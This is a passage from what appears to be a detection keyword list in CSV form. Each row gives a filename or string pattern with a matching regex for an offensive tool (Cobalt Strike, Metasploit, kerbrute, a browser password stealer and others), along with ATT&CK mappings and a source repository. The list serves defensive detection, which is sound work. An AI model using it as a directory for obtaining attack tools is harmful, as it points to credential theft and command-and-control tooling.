T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ausecwa/bof-registry","1","0","N/A","10","10","24","8","2021-02-11T04:38:28Z","2021-01-29T05:07:47Z" "*breg_add_string_value*",".{0,1000}breg_add_string_value.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ausecwa/bof-registry","1","1","N/A","10","10","24","8","2021-02-11T04:38:28Z","2021-01-29T05:07:47Z" "*bremote_exec*",".{0,1000}bremote_exec.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*breviaries -Properties DnsHostName*ms-Mcs-AdmPwd*",".{0,1000}breviaries\s\-Properties\sDnsHostName.{0,1000}ms\-Mcs\-AdmPwd.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*brew install sniffer*",".{0,1000}brew\sinstall\ssniffer.{0,1000}","offensive_tool_keyword","sniffer","A modern alternative network traffic sniffer.","T1040 - T1052.001 - T1046 - T1552.002","TA0011 - TA0007 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/chenjiandongx/sniffer","1","0","N/A","N/A","8","709","63","2024-03-02T07:48:19Z","2021-11-08T15:36:03Z" "*bropper.py *",".{0,1000}bropper\.py\s.{0,1000}","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Hakumarachi/Bropper","1","0","N/A","7","2","180","18","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z" "*Bropper-main.zip*",".{0,1000}Bropper\-main\.zip.{0,1000}","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Hakumarachi/Bropper","1","1","N/A","7","2","180","18","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z" "*browser.keylog_file.write*",".{0,1000}browser\.keylog_file\.write.{0,1000}","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","0","N/A","10","4","311","25","2024-03-28T14:17:28Z","2023-08-02T14:30:41Z" "*browser_##*",".{0,1000}browser_\#\#.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*browser_autopwn*",".{0,1000}browser_autopwn.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*browser_autopwn*",".{0,1000}browser_autopwn.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*browser_autopwn2_spec.rb*",".{0,1000}browser_autopwn2_spec\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*browser_exploit.rb*",".{0,1000}browser_exploit\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*browser_exploit_server_spec.rb*",".{0,1000}browser_exploit_server_spec\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*BrowserBookmarkDiscovery_BrowserHistory.py*",".{0,1000}BrowserBookmarkDiscovery_BrowserHistory\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Browser-C2.git*",".{0,1000}Browser\-C2\.git.{0,1000}","offensive_tool_keyword","Browser-C2","Post Exploitation agent which uses a browser to do C2 operations.","T1105 - T1102","TA0003 - TA0005 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/Browser-C2","1","1","N/A","10","10","100","27","2018-05-25T15:12:21Z","2018-05-22T14:33:24Z" "*Browser-C2-master.zip*",".{0,1000}Browser\-C2\-master\.zip.{0,1000}","offensive_tool_keyword","Browser-C2","Post Exploitation agent which uses a browser to do C2 operations.","T1105 - T1102","TA0003 - TA0005 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/Browser-C2","1","1","N/A","10","10","100","27","2018-05-25T15:12:21Z","2018-05-22T14:33:24Z" "*browserexploitserver.rb*",".{0,1000}browserexploitserver\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*BrowserGhost-N*.exe*",".{0,1000}BrowserGhost\-N.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","89","42","2024-04-21T05:49:15Z","2021-01-20T13:08:24Z" "*BrowserListener.py*",".{0,1000}BrowserListener\.py.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4355","1646","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*Browser-password-stealer.git*",".{0,1000}Browser\-password\-stealer\.git.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","1","N/A","10","4","368","59","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" "*Browser-password-stealer-master*",".{0,1000}Browser\-password\-stealer\-master.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","1","N/A","10","4","368","59","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" "*browserpivot *",".{0,1000}browserpivot\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*BrowsingHistoryView.cfg*",".{0,1000}BrowsingHistoryView\.cfg.{0,1000}","offensive_tool_keyword","BrowsingHistoryView","BrowsingHistoryView is a utility that reads the history data of different Web browsers","T1602 - T1119 - T1005","TA0009","N/A","N/A","Discovery","https://www.nirsoft.net/utils/browsing_history_view.html","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*BrowsingHistoryView.exe*",".{0,1000}BrowsingHistoryView\.exe.{0,1000}","offensive_tool_keyword","BrowsingHistoryView","BrowsingHistoryView is a utility that reads the history data of different Web browsers","T1602 - T1119 - T1005","TA0009","N/A","N/A","Discovery","https://www.nirsoft.net/utils/browsing_history_view.html","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*browsinghistoryview.exe*",".{0,1000}browsinghistoryview\.exe.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*BROWSINGHISTORYVIEW.EXE-*.pf*",".{0,1000}BROWSINGHISTORYVIEW\.EXE\-.{0,1000}\.pf.{0,1000}","offensive_tool_keyword","BrowsingHistoryView","BrowsingHistoryView is a utility that reads the history data of different Web browsers","T1602 - T1119 - T1005","TA0009","N/A","N/A","Discovery","https://www.nirsoft.net/utils/browsing_history_view.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*BrowsingHistoryView.html*",".{0,1000}BrowsingHistoryView\.html.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*browsinghistoryview.zip*",".{0,1000}browsinghistoryview\.zip.{0,1000}","offensive_tool_keyword","BrowsingHistoryView","BrowsingHistoryView is a utility that reads the history data of different Web browsers","T1602 - T1119 - T1005","TA0009","N/A","N/A","Discovery","https://www.nirsoft.net/utils/browsing_history_view.html","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*browsinghistoryview-x64.zip*",".{0,1000}browsinghistoryview\-x64\.zip.{0,1000}","offensive_tool_keyword","BrowsingHistoryView","BrowsingHistoryView is a utility that reads the history data of different Web browsers","T1602 - T1119 - T1005","TA0009","N/A","N/A","Discovery","https://www.nirsoft.net/utils/browsing_history_view.html","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*brun_script_in_mem*",".{0,1000}brun_script_in_mem.{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","193","33","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "*brunasadmin*",".{0,1000}brunasadmin.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*Brute forcing SIDs at *",".{0,1000}Brute\sforcing\sSIDs\sat\s.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*Brute/Brute.cs*",".{0,1000}Brute\/Brute\.cs.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*Brute/Brute.csproj*",".{0,1000}Brute\/Brute\.csproj.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*Brute/Brute.sln*",".{0,1000}Brute\/Brute\.sln.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*brute_force_ntlm.sh*",".{0,1000}brute_force_ntlm\.sh.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","8","4","328","69","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" "*bruteforce *.txt*",".{0,1000}bruteforce\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*Brute-force Unsuccessful!*",".{0,1000}Brute\-force\sUnsuccessful!.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","8","4","333","52","2024-04-04T22:56:00Z","2023-02-09T02:08:07Z" "*bruteforce.go*",".{0,1000}bruteforce\.go.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*BruteForce.ps1*",".{0,1000}BruteForce\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","8","4","333","52","2024-04-04T22:56:00Z","2023-02-09T02:08:07Z" "*Brute-Force.ps1*",".{0,1000}Brute\-Force\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*bruteforce_attack(*",".{0,1000}bruteforce_attack\(.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","10","4","312","54","2024-03-04T19:23:03Z","2021-07-16T14:53:29Z" "*bruteforce_mode_kerberos_mode*",".{0,1000}bruteforce_mode_kerberos_mode.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","10","4","312","54","2024-03-04T19:23:03Z","2021-07-16T14:53:29Z" "*bruteforce_mode_ntlm_mode*",".{0,1000}bruteforce_mode_ntlm_mode.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","10","4","312","54","2024-03-04T19:23:03Z","2021-07-16T14:53:29Z" "*bruteforce_try_password_or_hash(*",".{0,1000}bruteforce_try_password_or_hash\(.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","10","4","312","54","2024-03-04T19:23:03Z","2021-07-16T14:53:29Z" "*bruteforce_try_user(*",".{0,1000}bruteforce_try_user\(.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","10","4","312","54","2024-03-04T19:23:03Z","2021-07-16T14:53:29Z" 